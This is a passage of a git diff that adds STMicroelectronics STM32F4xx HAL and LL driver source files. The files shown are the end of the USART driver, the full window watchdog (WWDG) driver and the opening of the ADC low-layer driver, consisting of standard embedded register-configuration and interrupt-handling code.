CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + husart->State = HAL_USART_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @brief End ongoing Tx transfer on USART peripheral (following error detection or Transmit completion). + * @param husart USART handle. + * @retval None + */ +static void USART_EndTxTransfer(USART_HandleTypeDef *husart) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(husart->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* At end of Tx process, restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; +} + +/** + * @brief End ongoing Rx transfer on USART peripheral (following error detection or Reception completion). + * @param husart USART handle. + * @retval None + */ +static void USART_EndRxTransfer(USART_HandleTypeDef *husart) +{ + /* Disable RXNE, PE and ERR interrupts */ + CLEAR_BIT(husart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* At end of Rx process, restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; +} + +/** + * @brief DMA USART communication abort callback, when initiated by HAL services on Error + * (To be called at end of DMA Abort procedure following error occurrence). + * @param hdma DMA handle. + * @retval None + */ +static void USART_DMAAbortOnError(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + husart->RxXferCount = 0x00U; + husart->TxXferCount = 0x00U; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Error Callback */ + husart->ErrorCallback(husart); +#else + /* Call legacy weak Error Callback */ + HAL_USART_ErrorCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA USART Tx communication abort callback, when initiated by user + * (To be called at end of DMA Tx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Rx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void USART_DMATxAbortCallback(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + husart->hdmatx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (husart->hdmarx != NULL) + { + if (husart->hdmarx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + husart->TxXferCount = 0x00U; + husart->RxXferCount = 0x00U; + + /* Reset errorCode */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + + /* Restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Complete Callback */ + husart->AbortCpltCallback(husart); +#else + /* Call legacy weak Abort Complete Callback */ + HAL_USART_AbortCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA USART Rx communication abort callback, when initiated by user + * (To be called at end of DMA Rx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Tx DMA Handle. + * @param hdma DMA handle. + * @retval None + */ +static void USART_DMARxAbortCallback(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + husart->hdmarx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (husart->hdmatx != NULL) + { + if (husart->hdmatx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + husart->TxXferCount = 0x00U; + husart->RxXferCount = 0x00U; + + /* Reset errorCode */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + + /* Restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Complete Callback */ + husart->AbortCpltCallback(husart); +#else + /* Call legacy weak Abort Complete Callback */ + HAL_USART_AbortCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief Simplex Send an amount of data in non-blocking mode. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + * @note The USART errors are not managed to avoid the overrun error. + */ +static HAL_StatusTypeDef USART_Transmit_IT(USART_HandleTypeDef *husart) +{ + uint16_t *tmp; + + if (husart->State == HAL_USART_STATE_BUSY_TX) + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + tmp = (uint16_t *) husart->pTxBuffPtr; + husart->Instance->DR = (uint16_t)(*tmp & (uint16_t)0x01FF); + husart->pTxBuffPtr += 2U; + } + else + { + husart->Instance->DR = (uint8_t)(*husart->pTxBuffPtr++ & (uint8_t)0x00FF); + } + + if (--husart->TxXferCount == 0U) + { + /* Disable the USART Transmit data register empty Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_TXEIE); + + /* Enable the USART Transmit Complete Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_TCIE); + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Wraps up transmission in non blocking mode. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +static HAL_StatusTypeDef USART_EndTransmit_IT(USART_HandleTypeDef *husart) +{ + /* Disable the USART Transmit Complete Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_TCIE); + + /* Disable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + husart->State = HAL_USART_STATE_READY; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Complete Callback */ + husart->TxCpltCallback(husart); +#else + /* Call legacy weak Tx Complete Callback */ + HAL_USART_TxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + + return HAL_OK; +} + +/** + * @brief Simplex Receive an amount of data in non-blocking mode. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +static HAL_StatusTypeDef USART_Receive_IT(USART_HandleTypeDef *husart) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + + if (husart->State == HAL_USART_STATE_BUSY_RX) + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) husart->pRxBuffPtr; + *pdata16bits = (uint16_t)(husart->Instance->DR & (uint16_t)0x01FF); + husart->pRxBuffPtr += 2U; + } + else + { + pdata8bits = (uint8_t *) husart->pRxBuffPtr; + pdata16bits = NULL; + + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) || ((husart->Init.WordLength == USART_WORDLENGTH_8B) && (husart->Init.Parity == USART_PARITY_NONE))) + { + *pdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x007F); + } + + husart->pRxBuffPtr += 1U; + } + + husart->RxXferCount--; + + if (husart->RxXferCount == 0U) + { + /* Disable the USART RXNE Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_RXNEIE); + + /* Disable the USART Parity Error Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Disable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + husart->State = HAL_USART_STATE_READY; +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Rx Complete Callback */ + husart->RxCpltCallback(husart); +#else + /* Call legacy weak Rx Complete Callback */ + HAL_USART_RxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + + return HAL_OK; + } + else + { + /* Send dummy byte in order to generate the clock for the slave to send the next data. + * Whatever the frame length (7, 8 or 9-bit long), the same dummy value + * can be written for all the cases. */ + husart->Instance->DR = (DUMMY_DATA & (uint16_t)0x0FF); + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Send receive an amount of data in full-duplex mode (non-blocking). + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +static HAL_StatusTypeDef USART_TransmitReceive_IT(USART_HandleTypeDef *husart) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + + if (husart->State == HAL_USART_STATE_BUSY_TX_RX) + { + if (husart->TxXferCount != 0x00U) + { + if (__HAL_USART_GET_FLAG(husart, USART_FLAG_TXE) != RESET) + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) husart->pTxBuffPtr; + husart->Instance->DR = (uint16_t)(*pdata16bits & (uint16_t)0x01FF); + husart->pTxBuffPtr += 2U; + } + else + { + husart->Instance->DR = (uint8_t)(*husart->pTxBuffPtr++ & (uint8_t)0x00FF); + } + + husart->TxXferCount--; + + /* Check the latest data transmitted */ + if (husart->TxXferCount == 0U) + { + CLEAR_BIT(husart->Instance->CR1, USART_CR1_TXEIE); + } + } + } + + if (husart->RxXferCount != 0x00U) + { + if (__HAL_USART_GET_FLAG(husart, USART_FLAG_RXNE) != RESET) + { + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) && (husart->Init.Parity == USART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) husart->pRxBuffPtr; + *pdata16bits = (uint16_t)(husart->Instance->DR & (uint16_t)0x01FF); + husart->pRxBuffPtr += 2U; + } + else + { + pdata8bits = (uint8_t *) husart->pRxBuffPtr; + pdata16bits = NULL; + if ((husart->Init.WordLength == USART_WORDLENGTH_9B) || ((husart->Init.WordLength == USART_WORDLENGTH_8B) && (husart->Init.Parity == USART_PARITY_NONE))) + { + *pdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pdata8bits = (uint8_t)(husart->Instance->DR & (uint8_t)0x007F); + } + husart->pRxBuffPtr += 1U; + } + + husart->RxXferCount--; + } + } + + /* Check the latest data received */ + if (husart->RxXferCount == 0U) + { + /* Disable the USART RXNE Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_RXNEIE); + + /* Disable the USART Parity Error Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Disable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + husart->State = HAL_USART_STATE_READY; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Rx Complete Callback */ + husart->TxRxCpltCallback(husart); +#else + /* Call legacy weak Tx Rx Complete Callback */ + HAL_USART_TxRxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + + return HAL_OK; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configures the USART peripheral. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +static void USART_SetConfig(USART_HandleTypeDef *husart) +{ + uint32_t tmpreg = 0x00U; + uint32_t pclk; + + /* Check the parameters */ + assert_param(IS_USART_INSTANCE(husart->Instance)); + assert_param(IS_USART_POLARITY(husart->Init.CLKPolarity)); + assert_param(IS_USART_PHASE(husart->Init.CLKPhase)); + assert_param(IS_USART_LASTBIT(husart->Init.CLKLastBit)); + assert_param(IS_USART_BAUDRATE(husart->Init.BaudRate)); + assert_param(IS_USART_WORD_LENGTH(husart->Init.WordLength)); + assert_param(IS_USART_STOPBITS(husart->Init.StopBits)); + assert_param(IS_USART_PARITY(husart->Init.Parity)); + assert_param(IS_USART_MODE(husart->Init.Mode)); + + /* The LBCL, CPOL and CPHA bits have to be selected when both the transmitter and the + receiver are disabled (TE=RE=0) to ensure that the clock pulses function correctly. */ + CLEAR_BIT(husart->Instance->CR1, (USART_CR1_TE | USART_CR1_RE)); + + /*---------------------------- USART CR2 Configuration ---------------------*/ + tmpreg = husart->Instance->CR2; + /* Clear CLKEN, CPOL, CPHA and LBCL bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR2_CPHA | USART_CR2_CPOL | USART_CR2_CLKEN | USART_CR2_LBCL | USART_CR2_STOP)); + /* Configure the USART Clock, CPOL, CPHA and LastBit -----------------------*/ + /* Set CPOL bit according to husart->Init.CLKPolarity value */ + /* Set CPHA bit according to husart->Init.CLKPhase value */ + /* Set LBCL bit according to husart->Init.CLKLastBit value */ + /* Set Stop Bits: Set STOP[13:12] bits according to husart->Init.StopBits value */ + tmpreg |= (uint32_t)(USART_CLOCK_ENABLE | husart->Init.CLKPolarity | + husart->Init.CLKPhase | husart->Init.CLKLastBit | husart->Init.StopBits); + /* Write to USART CR2 */ + WRITE_REG(husart->Instance->CR2, (uint32_t)tmpreg); + + /*-------------------------- USART CR1 Configuration -----------------------*/ + tmpreg = husart->Instance->CR1; + + /* Clear M, PCE, PS, TE, RE and OVER8 bits */ + tmpreg &= (uint32_t)~((uint32_t)(USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | USART_CR1_TE | \ + USART_CR1_RE | USART_CR1_OVER8)); + + /* Configure the USART Word Length, Parity and mode: + Set the M bits according to husart->Init.WordLength value + Set PCE and PS bits according to husart->Init.Parity value + Set TE and RE bits according to husart->Init.Mode value + Force OVER8 bit to 1 in order to reach the max USART frequencies */ + tmpreg |= (uint32_t)husart->Init.WordLength | husart->Init.Parity | husart->Init.Mode | USART_CR1_OVER8; + + /* Write to USART CR1 */ + WRITE_REG(husart->Instance->CR1, (uint32_t)tmpreg); + + /*-------------------------- USART CR3 Configuration -----------------------*/ + /* Clear CTSE and RTSE bits */ + CLEAR_BIT(husart->Instance->CR3, (USART_CR3_RTSE | USART_CR3_CTSE)); + + /*-------------------------- USART BRR Configuration -----------------------*/ +#if defined(USART6) && defined(UART9) && defined(UART10) + if ((husart->Instance == USART1) || (husart->Instance == USART6) || (husart->Instance == UART9) || (husart->Instance == UART10)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + husart->Instance->BRR = USART_BRR(pclk, husart->Init.BaudRate); + } +#elif defined(USART6) + if((husart->Instance == USART1) || (husart->Instance == USART6)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + husart->Instance->BRR = USART_BRR(pclk, husart->Init.BaudRate); + } +#else + if(husart->Instance == USART1) + { + pclk = HAL_RCC_GetPCLK2Freq(); + husart->Instance->BRR = USART_BRR(pclk, husart->Init.BaudRate); + } +#endif /* USART6 || UART9 || UART10 */ + else + { + pclk = HAL_RCC_GetPCLK1Freq(); + husart->Instance->BRR = USART_BRR(pclk, husart->Init.BaudRate); + } +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_USART_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_wwdg.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_wwdg.c new file mode 100644 index 000000000..d1e2fa071 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_wwdg.c @@ -0,0 +1,422 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_wwdg.c + * @author MCD Application Team + * @brief WWDG HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Window Watchdog (WWDG) peripheral: + * + Initialization and Configuration functions + * + IO operation functions + @verbatim + ============================================================================== + ##### WWDG Specific features ##### + ============================================================================== + [..] + Once enabled the WWDG generates a system reset on expiry of a programmed + time period, unless the program refreshes the counter (T[6;0] downcounter) + before reaching 0x3F value (i.e. a reset is generated when the counter + value rolls down from 0x40 to 0x3F). + + (+) An MCU reset is also generated if the counter value is refreshed + before the counter has reached the refresh window value. This + implies that the counter must be refreshed in a limited window. + (+) Once enabled the WWDG cannot be disabled except by a system reset. + (+) If required by application, an Early Wakeup Interrupt can be triggered + in order to be warned before WWDG expiration. The Early Wakeup Interrupt + (EWI) can be used if specific safety operations or data logging must + be performed before the actual reset is generated. When the downcounter + reaches 0x40, interrupt occurs. This mechanism requires WWDG interrupt + line to be enabled in NVIC. Once enabled, EWI interrupt cannot be + disabled except by a system reset. + (+) WWDGRST flag in RCC CSR register can be used to inform when a WWDG + reset occurs. + (+) The WWDG counter input clock is derived from the APB clock divided + by a programmable prescaler. + (+) WWDG clock (Hz) = PCLK1 / (4096 * Prescaler) + (+) WWDG timeout (mS) = 1000 * (T[5;0] + 1) / WWDG clock (Hz) + where T[5;0] are the lowest 6 bits of Counter. + (+) WWDG Counter refresh is allowed between the following limits : + (++) min time (mS) = 1000 * (Counter - Window) / WWDG clock + (++) max time (mS) = 1000 * (Counter - 0x40) / WWDG clock + (+) Typical values: + (++) Counter min (T[5;0] = 0x00) at 42MHz (PCLK1) with zero prescaler: + max timeout before reset: approximately 97.52s + (++) Counter max (T[5;0] = 0x3F) at 42MHz (PCLK1) with prescaler + dividing by 8: + max timeout before reset: approximately 49.93ms + + ##### How to use this driver ##### + ============================================================================== + + *** Common driver usage *** + =========================== + + [..] + (+) Enable WWDG APB1 clock using __HAL_RCC_WWDG_CLK_ENABLE(). + (+) Configure the WWDG prescaler, refresh window value, counter value and early + interrupt status using HAL_WWDG_Init() function. This will automatically + enable WWDG and start its downcounter. Time reference can be taken from + function exit. Care must be taken to provide a counter value + greater than 0x40 to prevent generation of immediate reset. + (+) If the Early Wakeup Interrupt (EWI) feature is enabled, an interrupt is + generated when the counter reaches 0x40. When HAL_WWDG_IRQHandler is + triggered by the interrupt service routine, flag will be automatically + cleared and HAL_WWDG_WakeupCallback user callback will be executed. User + can add his own code by customization of callback HAL_WWDG_WakeupCallback. + (+) Then the application program must refresh the WWDG counter at regular + intervals during normal operation to prevent an MCU reset, using + HAL_WWDG_Refresh() function. This operation must occur only when + the counter is lower than the refresh window value already programmed. + + *** Callback registration *** + ============================= + + [..] + The compilation define USE_HAL_WWDG_REGISTER_CALLBACKS when set to 1 allows + the user to configure dynamically the driver callbacks. Use Functions + HAL_WWDG_RegisterCallback() to register a user callback. + + (+) Function HAL_WWDG_RegisterCallback() allows to register following + callbacks: + (++) EwiCallback : callback for Early WakeUp Interrupt. + (++) MspInitCallback : WWDG MspInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + (+) Use function HAL_WWDG_UnRegisterCallback() to reset a callback to + the default weak (surcharged) function. HAL_WWDG_UnRegisterCallback() + takes as parameters the HAL peripheral handle and the Callback ID. + This function allows to reset following callbacks: + (++) EwiCallback : callback for Early WakeUp Interrupt. + (++) MspInitCallback : WWDG MspInit. + + [..] + When calling HAL_WWDG_Init function, callbacks are reset to the + corresponding legacy weak (surcharged) functions: + HAL_WWDG_EarlyWakeupCallback() and HAL_WWDG_MspInit() only if they have + not been registered before. + + [..] + When compilation define USE_HAL_WWDG_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + *** WWDG HAL driver macros list *** + =================================== + [..] + Below the list of available macros in WWDG HAL driver. + (+) __HAL_WWDG_ENABLE: Enable the WWDG peripheral + (+) __HAL_WWDG_GET_FLAG: Get the selected WWDG's flag status + (+) __HAL_WWDG_CLEAR_FLAG: Clear the WWDG's pending flags + (+) __HAL_WWDG_ENABLE_IT: Enable the WWDG early wakeup interrupt + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_WWDG_MODULE_ENABLED +/** @defgroup WWDG WWDG + * @brief WWDG HAL module driver. + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup WWDG_Exported_Functions WWDG Exported Functions + * @{ + */ + +/** @defgroup WWDG_Exported_Functions_Group1 Initialization and Configuration functions + * @brief Initialization and Configuration functions. + * +@verbatim + ============================================================================== + ##### Initialization and Configuration functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and start the WWDG according to the specified parameters + in the WWDG_InitTypeDef of associated handle. + (+) Initialize the WWDG MSP. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the WWDG according to the specified. + * parameters in the WWDG_InitTypeDef of associated handle. + * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains + * the configuration information for the specified WWDG module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_WWDG_Init(WWDG_HandleTypeDef *hwwdg) +{ + /* Check the WWDG handle allocation */ + if (hwwdg == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_WWDG_ALL_INSTANCE(hwwdg->Instance)); + assert_param(IS_WWDG_PRESCALER(hwwdg->Init.Prescaler)); + assert_param(IS_WWDG_WINDOW(hwwdg->Init.Window)); + assert_param(IS_WWDG_COUNTER(hwwdg->Init.Counter)); + assert_param(IS_WWDG_EWI_MODE(hwwdg->Init.EWIMode)); + +#if (USE_HAL_WWDG_REGISTER_CALLBACKS == 1) + /* Reset Callback pointers */ + if (hwwdg->EwiCallback == NULL) + { + hwwdg->EwiCallback = HAL_WWDG_EarlyWakeupCallback; + } + + if (hwwdg->MspInitCallback == NULL) + { + hwwdg->MspInitCallback = HAL_WWDG_MspInit; + } + + /* Init the low level hardware */ + hwwdg->MspInitCallback(hwwdg); +#else + /* Init the low level hardware */ + HAL_WWDG_MspInit(hwwdg); +#endif /* USE_HAL_WWDG_REGISTER_CALLBACKS */ + + /* Set WWDG Counter */ + WRITE_REG(hwwdg->Instance->CR, (WWDG_CR_WDGA | hwwdg->Init.Counter)); + + /* Set WWDG Prescaler and Window */ + WRITE_REG(hwwdg->Instance->CFR, (hwwdg->Init.EWIMode | hwwdg->Init.Prescaler | hwwdg->Init.Window)); + + /* Return function status */ + return HAL_OK; +} + + +/** + * @brief Initialize the WWDG MSP. + * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains + * the configuration information for the specified WWDG module. + * @note When rewriting this function in user file, mechanism may be added + * to avoid multiple initialize when HAL_WWDG_Init function is called + * again to change parameters. + * @retval None + */ +__weak void HAL_WWDG_MspInit(WWDG_HandleTypeDef *hwwdg) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hwwdg); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_WWDG_MspInit could be implemented in the user file + */ +} + + +#if (USE_HAL_WWDG_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User WWDG Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hwwdg WWDG handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_WWDG_EWI_CB_ID Early WakeUp Interrupt Callback ID + * @arg @ref HAL_WWDG_MSPINIT_CB_ID MspInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_WWDG_RegisterCallback(WWDG_HandleTypeDef *hwwdg, HAL_WWDG_CallbackIDTypeDef CallbackID, + pWWDG_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + status = HAL_ERROR; + } + else + { + switch (CallbackID) + { + case HAL_WWDG_EWI_CB_ID: + hwwdg->EwiCallback = pCallback; + break; + + case HAL_WWDG_MSPINIT_CB_ID: + hwwdg->MspInitCallback = pCallback; + break; + + default: + status = HAL_ERROR; + break; + } + } + + return status; +} + + +/** + * @brief Unregister a WWDG Callback + * WWDG Callback is redirected to the weak (surcharged) predefined callback + * @param hwwdg WWDG handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_WWDG_EWI_CB_ID Early WakeUp Interrupt Callback ID + * @arg @ref HAL_WWDG_MSPINIT_CB_ID MspInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_WWDG_UnRegisterCallback(WWDG_HandleTypeDef *hwwdg, HAL_WWDG_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + switch (CallbackID) + { + case HAL_WWDG_EWI_CB_ID: + hwwdg->EwiCallback = HAL_WWDG_EarlyWakeupCallback; + break; + + case HAL_WWDG_MSPINIT_CB_ID: + hwwdg->MspInitCallback = HAL_WWDG_MspInit; + break; + + default: + status = HAL_ERROR; + break; + } + + return status; +} +#endif /* USE_HAL_WWDG_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup WWDG_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Refresh the WWDG. + (+) Handle WWDG interrupt request and associated function callback. + +@endverbatim + * @{ + */ + +/** + * @brief Refresh the WWDG. + * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains + * the configuration information for the specified WWDG module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_WWDG_Refresh(WWDG_HandleTypeDef *hwwdg) +{ + /* Write to WWDG CR the WWDG Counter value to refresh with */ + WRITE_REG(hwwdg->Instance->CR, (hwwdg->Init.Counter)); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Handle WWDG interrupt request. + * @note The Early Wakeup Interrupt (EWI) can be used if specific safety operations + * or data logging must be performed before the actual reset is generated. + * The EWI interrupt is enabled by calling HAL_WWDG_Init function with + * EWIMode set to WWDG_EWI_ENABLE. + * When the downcounter reaches the value 0x40, and EWI interrupt is + * generated and the corresponding Interrupt Service Routine (ISR) can + * be used to trigger specific actions (such as communications or data + * logging), before resetting the device. + * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains + * the configuration information for the specified WWDG module. + * @retval None + */ +void HAL_WWDG_IRQHandler(WWDG_HandleTypeDef *hwwdg) +{ + /* Check if Early Wakeup Interrupt is enable */ + if (__HAL_WWDG_GET_IT_SOURCE(hwwdg, WWDG_IT_EWI) != RESET) + { + /* Check if WWDG Early Wakeup Interrupt occurred */ + if (__HAL_WWDG_GET_FLAG(hwwdg, WWDG_FLAG_EWIF) != RESET) + { + /* Clear the WWDG Early Wakeup flag */ + __HAL_WWDG_CLEAR_FLAG(hwwdg, WWDG_FLAG_EWIF); + +#if (USE_HAL_WWDG_REGISTER_CALLBACKS == 1) + /* Early Wakeup registered callback */ + hwwdg->EwiCallback(hwwdg); +#else + /* Early Wakeup callback */ + HAL_WWDG_EarlyWakeupCallback(hwwdg); +#endif /* USE_HAL_WWDG_REGISTER_CALLBACKS */ + } + } +} + + +/** + * @brief WWDG Early Wakeup callback. + * @param hwwdg pointer to a WWDG_HandleTypeDef structure that contains + * the configuration information for the specified WWDG module. + * @retval None + */ +__weak void HAL_WWDG_EarlyWakeupCallback(WWDG_HandleTypeDef *hwwdg) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hwwdg); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_WWDG_EarlyWakeupCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_WWDG_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_adc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_adc.c new file mode 100644 index 000000000..5710e2664 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_adc.c @@ -0,0 +1,924 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_adc.c + * @author MCD Application Team + * @brief ADC LL module driver + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_adc.h" +#include "stm32f4xx_ll_bus.h" + +#ifdef USE_FULL_ASSERT + #include "stm32_assert.h" +#else + #define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (ADC1) || defined (ADC2) || defined (ADC3) + +/** @addtogroup ADC_LL ADC + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ + +/** @addtogroup ADC_LL_Private_Macros + * @{ + */ + +/* Check of parameters for configuration of ADC hierarchical scope: */ +/* common to several ADC instances. */ +#define IS_LL_ADC_COMMON_CLOCK(__CLOCK__) \ + ( ((__CLOCK__) == 